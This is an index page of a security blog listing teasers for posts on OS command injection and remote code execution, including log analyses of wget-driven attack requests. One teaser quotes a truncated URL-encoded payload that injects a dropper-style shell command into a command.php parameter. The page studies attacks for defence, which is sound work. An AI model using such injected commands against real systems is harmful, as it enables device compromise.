neonprimetime security , just trying to help
Showing posts with label
OS Command Injection
.
Show all posts
Showing posts with label
OS Command Injection
.
Show all posts
Tuesday, August 9, 2016
command.php wget HTTP Post
›
POST /command.php HTTP/1.0 User-Agent: Wget(linux) cmd=%63%64%20%2F%76%61%72%2F%74%6D%70%20%26%26%20%65%63%68%6F%20%2D%6E%65%20%5C%5C%78...
hndUnblock.cgi wget calls
›
GET /hndUnblock.cgi HTTP/1.0 User-Agent: Wget(linux) Saw this http request in the logs, what could it mean? It appears that in April 2...
Friday, February 5, 2016
›
I really enjoyed TechAnarchy's blog on a command injection vulnerability in Security Onion. It was easy to read and thus very education...
Sunday, November 15, 2015
vBulletin 5.1.x #rce walk-through
›
I saw this vBulletin rce exploit on pastebin written in python by Mauritania Attacker. Thought it was interesting and worth talking thru. ...
2 comments:
Tuesday, November 10, 2015
Digging Deeper on xsl payload @e3xpl0it #XXE #RCE
›
I saw this tweet by @e3xpl0it about Remote Code Execution in XSL (EXtensible Stylesheet Language) Transformations. It contained as ex...
›
Home
View web version